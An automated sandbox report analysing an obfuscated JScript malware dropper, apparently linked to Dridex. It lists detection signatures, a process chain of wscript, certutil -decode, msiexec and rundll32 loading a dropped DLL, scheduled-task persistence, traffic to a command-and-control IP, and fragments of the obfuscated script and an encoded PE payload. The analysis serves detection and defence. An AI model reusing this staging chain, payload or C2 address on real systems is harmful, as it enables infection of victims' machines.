Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1234.js

Overview

General Information

Sample name:1234.js
Analysis ID:1541406
MD5:7dea02845300c31f60e21494c492c870
SHA1:8ebbbeeb723eea278a343e95d1243577c445845b
SHA256:9b38cc509b1a4a401275bcb5e896917c842431f9190c417147c35b20b99c4d85
Tags:jsuser-pr0xylife
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Found evasive API chain (may stop execution after checking mutex)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Potential obfuscated javascript found
Sigma detected: WScript or CScript Dropper
Uses certutil -decode
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Msiexec Execute Arbitrary DLL
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • wscript.exe (PID: 4320 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • certutil.exe (PID: 1196 cmdline: C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp MD5: F17616EC0522FC5633151F7CAA278CAA)
    • conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • msiexec.exe (PID: 2084 cmdline: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp MD5: E5DA170027542E25EDE42FC54C929077)
  • certutil.exe (PID: 6472 cmdline: C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp MD5: F17616EC0522FC5633151F7CAA278CAA)
    • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • msiexec.exe (PID: 6788 cmdline: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp MD5: E5DA170027542E25EDE42FC54C929077)
  • rundll32.exe (PID: 5356 cmdline: C:\Windows\system32\rundll32.exe "C:\ProgramData\Tyrannosaurus Tech\Updater.dll",Start /u MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js", ProcessId: 4320, ProcessName: wscript.exe
Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp, CommandLine: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp, CommandLine|base64offset|contains: , Image: C:\Windows\System32\msiexec.exe, NewProcessName: C:\Windows\System32\msiexec.exe, OriginalFileName: C:\Windows\System32\msiexec.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp, ProcessId: 2084, ProcessName: msiexec.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js", ProcessId: 4320, ProcessName: wscript.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-24T19:50:13.785415+020020287653Unknown Traffic192.168.2.450002185.161.251.26443TCP
2024-10-24T19:50:14.836595+020020287653Unknown Traffic192.168.2.450003185.161.251.26443TCP

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 185.161.251.26:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.161.251.26:443 -> 192.168.2.4:50003 version: TLS 1.2
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A5113A0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,sprintf_s,FindFirstFileW,FindNextFileW,FindClose,11_2_00007FFE1A5113A0

Software Vulnerabilities

barindex
Source: 1234.jsArgument value : ['"function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+pad']Go to definition
Source: 1234.jsArgument value : ['"1n 19(28,3y,3A){q o="";q i=0;28F(i<3A-28.28E().28D){o=o+3y;i++}o=o+28;3w(o)}1n 25(t){q 11,27;11=19(', '"function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+pad']Go to definition
Source: 1234.jsArgument value : ['"1n 19(28,3y,3A){q o="";q i=0;28F(i<3A-28.28E().28D){o=o+3y;i++}o=o+28;3w(o)}1n 25(t){q 11,27;11=19(', '"function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+pad']Go to definition

Networking

barindex
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 185.161.251.26 443Jump to behavior
Source: Joe Sandbox ViewASN Name: NTLGB NTLGB
Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50002 -> 185.161.251.26:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50003 -> 185.161.251.26:443
Source: unknownTCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknownTCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknownTCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknownTCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknownTCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknownTCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknownTCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknownTCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknownTCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknownTCP traffic detected without corresponding DNS query: 185.161.251.26
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A511C40 LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,SetLastError,HttpSendRequestW,GetLastError,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,11_2_00007FFE1A511C40
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFAC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.161.251.26/
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.161.251.26/0
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.161.251.26/I
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.161.251.26/O&=
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.161.251.26/P
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.161.251.26/nfoEx2
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownHTTPS traffic detected: 185.161.251.26:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.161.251.26:443 -> 192.168.2.4:50003 version: TLS 1.2
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Tasks\Tyrannosaurus Tech.jobJump to behavior
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A511C4011_2_00007FFE1A511C40
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A5145E011_2_00007FFE1A5145E0
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A5168A011_2_00007FFE1A5168A0
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A512C4011_2_00007FFE1A512C40
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A513F3011_2_00007FFE1A513F30
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A51CD3811_2_00007FFE1A51CD38
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A52350811_2_00007FFE1A523508
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A51B31011_2_00007FFE1A51B310
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A5218C011_2_00007FFE1A5218C0
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A51EFB011_2_00007FFE1A51EFB0
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A51199011_2_00007FFE1A511990
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A51516011_2_00007FFE1A515160
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A518F6811_2_00007FFE1A518F68
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A51317011_2_00007FFE1A513170
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A52257811_2_00007FFE1A522578
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A522D5C11_2_00007FFE1A522D5C
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A5221C811_2_00007FFE1A5221C8
Source: 1234.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal76.evad.winJS@8/4@0/1
Source: C:\Windows\System32\rundll32.exeCode function: 11_2_00007FFE1A517740 CoInitializeEx,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,SysAllocString,SysAllocString,SysFreeString,SysFreeString,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,11_2_00007FFE1A517740
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03
Source: C:\Windows\System32\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\461592c6-32a2-4a5a-9542-783ba1348002
Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\5bba9e40-0e32-4b7f-b39a-667bbc0c2293
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\rad603BF.tmpJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\ProgramData\Tyrannosaurus Tech\Updater.dll",Start /u
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js"
Source: unknownProcess created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp
Source: C:\Windows\System32\certutil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp
Source: unknownProcess created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp
Source: C:\Windows\System32\certutil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\ProgramData\Tyrannosaurus Tech\Updater.dll",Start /u
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certca.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: certca.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\certutil.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mstask.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile(encoded_name);var t0='';t0=t0.concat('TVqQAAMAAAAEAAAA//8AAL');t0=t0.concat('gAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGh');t0=t0.concat('pcyBwcm9ncmFtIG');t0=t0.concat('Nhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQR');t0=t0.concat('QAAZIYGAGiDJFsAAAAAAAAAAPAAIiALAgwAADQBAADyAAAAAAAAv');t0=t0.concat('IoAAAAQAAAAAACAAQAAAAAQAAAAAgAABgAAAAAAAAA');t0=t0.concat('GAAAAAAAAAABwAgAABAAAAAA');t0=t0.concat('AAAIAYAEAABAAAAAAAAAQAAAAAAAAAAAQA');t0=t0.concat('AAAAAAAEAAAAAAAAAAAAAAQAAAAUNoBALgAAAAI2wEAjA');t0=t0.concat('AAAABQAgDgAQAAADACAHARAAAAAAAAAAAAAABgA');t0=t0.concat('gDABQAAAAAAAAAAAAAAAAAAAAAAAAAAAA');t0=t0.concat('AAAAAAAAAAAAAAA');t0=t0.concat('ABQxQEAcAAAAAAAAAAAAAAAAFABAJADAAA');t0=t0.concat('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV');t0=t0.concat('4dAAAADQyAQAAEAAAADQBAA');t0=t0.concat('AEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAC4lgAAAFABA');t0=t0.concat('ACYAAAAOAEAAAAAAAAAAAAAAAAAQAAAQC5kY');t0=t0.concat('XRhAAAAuD8AAADwAQAAGgAAANA');t0=t0.concat('BAAAAAAAAAAAAAAA');t0=t0.concat('AAEAAAMAucGRhdGEAAHARAAAAMAIAABIAAADq');t0=t0.concat('AQAAAAAAAAAAAAAAA');t0=t0.concat('ABAAABALnJzcmMAAADgAQAAAFACA');t0=t0.concat('AACAAAA/AEAAAAA');t0=t0.concat('AAAAAAAAAAAAQAAAQC5');t0=t0.concat('yZWxvYwAAwAUAAABgAgAABgAAAP4BAAAAAAAAAAAAAAAA');t0=t0.concat('AEAAAEIAAAAAAAAAAAAAAAAAAAAAA